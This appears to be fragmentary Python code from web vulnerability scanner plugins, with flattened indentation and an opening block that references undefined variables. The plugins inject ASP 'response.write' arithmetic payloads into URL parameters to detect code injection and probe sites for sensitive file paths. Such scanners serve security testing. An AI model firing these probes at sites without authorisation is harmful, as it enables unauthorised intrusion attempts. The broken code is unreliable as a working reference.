flag = "{ranstr}.?{{?{int}}}?{ranstr}".format(ranstr=randstr,
int=randint1 *
randint2)
for payload in payloads:
data[k] = v + payload
r = requests.get(netloc, params=data, headers=headers)
if re.search(flag, r.text):
out.success(url,
self.name,
payload="{}:{}".format(k,
data[k],
raw=r.raw))
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
p = self.requests.urlparse
params = self.requests.params
netloc = self.requests.netloc
if method == 'GET':
if p.query == '':
return
exi = os.path.splitext(p.path)[1]
if exi not in acceptedExt:
return
randint1 = random.randint(10000, 90000)
randint2 = random.randint(10000, 90000)
randint3 = randint1 * randint2
payloads = [
'response.write({}*{})'.format(randint1, randint2),
'\'+response.write({}*{})+\''.format(randint1, randint2),
'"response.write({}*{})+"'.format(randint1, randint2),
]
for k, v in params.items():
if k.lower() in ignoreParams:
continue
data = copy.deepcopy(params)
for payload in payloads:
if payload[0] == "":
data[k] = payload
else:
data[k] = v + payload
url1 = prepare_url(netloc, params=data)
r = requests.get(url1, headers=headers)
html1 = r.text
if str(randint3) in html1:
out.success(url,
self.name,
payload="{}:{}".format(k, data[k]),
raw=r.raw)
break
def audit(self):
method = self.requests.command # 请求方式 GET or POST
headers = self.requests.get_headers() # 请求头 dict类型
url = self.build_url() # 请求完整URL
data = self.requests.get_body_data().decode() # POST 数据
resp_data = self.response.get_body_data() # 返回数据 byte类型
resp_str = self.response.get_body_str() # 返回数据 str类型 自动解码
resp_headers = self.response.get_headers() # 返回头 dict类型
path1 = get_parent_paths(url)
urls = set(path1)
for link in get_links(resp_str, url, True):
path1 = get_parent_paths(link)
urls |= set(path1)
for p in urls:
filename = self.file()
success = []
for f in filename:
_ = p.rstrip('/') + f
if not Share.in_url(_):
Share.add_url(_)
try:
r = requests.get(_, headers=headers)
# out.log(_)
if r.status_code == 200:
success.append({"url": _, "code": len(r.text)})
# print(self.name)
except Exception as e:
pass
if len(success) < 5:
for i in success:
out.success(i["url"], self.name)
else:
result = {}
for item in success:
length = item.get("len", 0)
if length not in result:
result[length] = list()
result[length].append(item["url"])
for k, v in result.items():
if len(v) > 3:
continue
for i in v:
out.success(i, self.name)
